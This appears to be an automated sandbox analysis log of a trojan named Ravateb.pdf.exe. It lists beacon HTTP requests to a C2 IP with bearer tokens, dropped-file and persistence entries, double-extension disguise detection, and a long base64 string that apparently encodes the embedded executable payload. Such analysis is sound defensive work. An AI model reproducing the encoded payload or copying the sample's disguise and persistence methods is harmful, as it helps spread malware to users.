          Source: global trafficHTTP traffic detected: GET /resource HTTP/1.1Host: 89.46.233.239Host: Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Authorization: Bearer SLTGCoiLjGhLcClIKQVYFAFNVW0oDBQJTSkJEExQQ
          Source: global trafficHTTP traffic detected: GET /resource HTTP/1.1Host: 89.46.233.239Host: Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Authorization: Bearer OLSPCoiLjThLcClBKQVYFAFNVW0oDBQJTSkJEExQQ
          Source: global trafficHTTP traffic detected: GET /resource HTTP/1.1Host: 89.46.233.239Host: Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Authorization: Bearer RLNCCoiLjLhLcClGKQVYFAFNVW0oDBQJTSkJEExQQ
          Source: global trafficHTTP traffic detected: GET /resource HTTP/1.1Host: 89.46.233.239Host: Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Authorization: Bearer MLCNCoiLjJhLcClVKQVYFAFNVW0oDBQJTSkJEExQQ
          Source: global trafficHTTP traffic detected: GET /resource HTTP/1.1Host: 89.46.233.239Host: Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Authorization: Bearer MLLQCoiLjChLcClBKQVYFAFNVW0oDBQJTSkJEExQQ
          Source: global trafficHTTP traffic detected: GET /resource HTTP/1.1Host: 89.46.233.239Host: Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Authorization: Bearer FLCLCoiLjThLcClYKQVYFAFNVW0oDBQJTSkJEExQQ
          Source: global trafficHTTP traffic detected: GET /resource HTTP/1.1Host: 89.46.233.239Host: Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Authorization: Bearer MLHZCoiLjGhLcClIKQVYFAFNVW0oDBQJTSkJEExQQ
          Source: global trafficHTTP traffic detected: GET /resource HTTP/1.1Host: 89.46.233.239Host: Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Authorization: Bearer ILKGCoiLjVhLcClFKQVYFAFNVW0oDBQJTSkJEExQQ
          Source: global trafficHTTP traffic detected: GET /resource HTTP/1.1Host: 89.46.233.239Host: Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Authorization: Bearer ELVHCoiLjVhLcClSKQVYFAFNVW0oDBQJTSkJEExQQ
          Source: global trafficHTTP traffic detected: GET /resource HTTP/1.1Host: 89.46.233.239Host: Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Authorization: Bearer ULGLCoiLjEhLcClOKQVYFAFNVW0oDBQJTSkJEExQQ
          Source: global trafficHTTP traffic detected: GET /resource HTTP/1.1Host: 89.46.233.239Host: Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Authorization: Bearer ULGLCoiLjEhLcClOKQVYFAFNVW0oDBQJTSkJEExQQ
          Source: global trafficHTTP traffic detected: GET /resource HTTP/1.1Host: 89.46.233.239Host: Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Authorization: Bearer ULGLCoiLjEhLcClOKQVYFAFNVW0oDBQJTSkJEExQQ
          Source: global trafficHTTP traffic detected: GET /resource HTTP/1.1Host: 89.46.233.239Host: Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Authorization: Bearer ZLYPCoiLjZhLcClVKQVYFAFNVW0oDBQJTSkJEExQQ
          Source: global trafficHTTP traffic detected: GET /resource HTTP/1.1Host: 89.46.233.239Host: Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Authorization: Bearer QLJXCoiLjMhLcClEKQVYFAFNVW0oDBQJTSkJEExQQ
          Source: global trafficHTTP traffic detected: GET /resource HTTP/1.1Host: 89.46.233.239Host: Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Authorization: Bearer ELJNCoiLjYhLcClXKQVYFAFNVW0oDBQJTSkJEExQQ
          Source: global trafficHTTP traffic detected: GET /resource HTTP/1.1Host: 89.46.233.239Host: Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Authorization: Bearer RLHGCoiLjZhLcClOKQVYFAFNVW0oDBQJTSkJEExQQ

          System Summary

          barindex
          Source: Ravateb.pdf.exe, Class1.csBase64 encoded string: System.Net
          Source: Ravateb.pdf.exe, Class1.csLong String: Length: 29361
          Source: initial sampleStatic PE information: Filename: Ravateb.pdf.exe
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeCode function: 0_2_00007FFC3DDA4DE60_2_00007FFC3DDA4DE6
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeCode function: 0_2_00007FFC3DDA65950_2_00007FFC3DDA6595
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeCode function: 0_2_00007FFC3DDA091D0_2_00007FFC3DDA091D
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeCode function: 0_2_00007FFC3DDB1CA10_2_00007FFC3DDB1CA1
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeCode function: 0_2_00007FFC3DDA5B920_2_00007FFC3DDA5B92
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeCode function: 0_2_00007FFC3DDA7D7F0_2_00007FFC3DDA7D7F
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeCode function: 0_2_00007FFC3DDA6D3E0_2_00007FFC3DDA6D3E
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeCode function: 0_2_00007FFC3DDA0AF70_2_00007FFC3DDA0AF7
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeCode function: 0_2_00007FFC3DDA0AC10_2_00007FFC3DDA0AC1
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeCode function: 0_2_00007FFC3DE80DDE0_2_00007FFC3DE80DDE
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeCode function: 8_2_00007FFC3DE415088_2_00007FFC3DE41508
          Source: Ravateb.pdf.exe, 00000000.00000002.1372556909.0000000002C81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprogram.exe0 vs Ravateb.pdf.exe
          Source: Ravateb.pdf.exe, 00000000.00000000.1167863344.00000000009D6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamewindowsObject.exe< vs Ravateb.pdf.exe
          Source: Ravateb.pdf.exe, 00000000.00000002.1372556909.0000000002E74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprogram.exe0 vs Ravateb.pdf.exe
          Source: Ravateb.pdf.exeBinary or memory string: OriginalFilenamewindowsObject.exe< vs Ravateb.pdf.exe
          Source: Ravateb.pdf.exe, Class1.csBase64 encoded string: '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
          Source: classification engineClassification label: mal100.troj.evad.winEXE@2/3@0/1
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeFile created: C:\users\user\AppData\Roaming\Microsoft\WindowsObjectJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeMutant created: NULL
          Source: Ravateb.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: Ravateb.pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: Ravateb.pdf.exeReversingLabs: Detection: 52%
          Source: Ravateb.pdf.exeVirustotal: Detection: 56%
          Source: Ravateb.pdf.exeString found in binary or memory: 5DisallowStartIfOnBatteries-StopIfGoingOnBatteries!AllowDemandStart%StartWhenAvailable
          Source: unknownProcess created: C:\Users\user\Desktop\Ravateb.pdf.exe "C:\Users\user\Desktop\Ravateb.pdf.exe"
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe C:\users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -time 6.9.2018
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeSection loaded: iconcodecservice.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
          Source: Ravateb.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Ravateb.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Ravateb.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Ravateb.pdf.exeStatic PE information: 0xB2D854D6 [Fri Jan 30 06:19:02 2065 UTC]
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeCode function: 0_2_00007FFC3DDA00BD pushad ; iretd 0_2_00007FFC3DDA00C1
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeCode function: 0_2_00007FFC3DE87EB2 pushad ; ret 0_2_00007FFC3DE88071
          Source: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeCode function: 8_2_00007FFC3DE400BD pushad ; iretd 8_2_00007FFC3DE400C1

          Persistence and Installation Behavior

          barindex
          Source: Yara matchFile source: 00000000.00000002.1371627977.0000000000ED6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1374305706.000000001BE34000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1374192389.000000001BDEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Ravateb.pdf.exe PID: 7532, type: MEMORYSTR
          Source: C:\Users\user\Desktop\Ravateb.pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exeJump to dropped file

          Boot Survival

          barindex
          Source: Yara matchFile source: 00000000.00000002.1371627977.0000000000ED6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1374305706.000000001BE34000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1374192389.000000001BDEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Ravateb.pdf.exe PID: 7532, type: MEMORYSTR

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: Possible double extension: pdf.exeStatic PE information: Ravateb.pdf.exe
          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 10443
          Source: unknownNetwork traffic detected: HTTP traffic on port 10443 -> 49721
          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 10443
          Source: unknownNetwork traffic detected: HTTP traffic on port 10443 -> 49722
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 10443
          Source: unknownNetwork traffic detected: HTTP traffic on port 10443 -> 49723
          Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 10443
          Source: unknownNetwork traffic detected: HTTP traffic on port 10443 -> 49724
          Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 10443
          Source: unknownNetwork traffic detected: HTTP traffic on port 10443 -> 49726
          Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 10443
          Source: unknownNetwork traffic detected: HTTP traffic on port 10443 -> 49727
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 10443
          Source: unknownNetwork traffic detected: HTTP traffic on port 10443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 10443
          Source: unknownNetwork traffic detected: HTTP traffic on port 10443 -> 49729
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 10443
          Source: unknownNetwork traffic detected: HTTP traffic on port 10443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 10443
          Source: unknownNetwork traffic detected: HTTP traffic on port 10443 -> 49731
          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 10443
          Source: unknownNetwork traffic detected: HTTP traffic on port 10443 -> 49732
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 10443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 10443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 10443
          Source: unknownNetwork traffic detected: HTTP traffic on port 10443 -> 49733
          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 10443
          Source: unknownNetwork traffic detected: HTTP traffic on port 10443 -> 49734
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 10443
          Source: unknownNetwork traffic detected: HTTP traffic on port 10443 -> 49735
          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 10443
          Source: unknownNetwork traffic detected: HTTP traffic on port 10443 -> 49736
          Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 10443
          Source: unknownNetwork traffic detected: HTTP traffic on port 10443 -> 49737
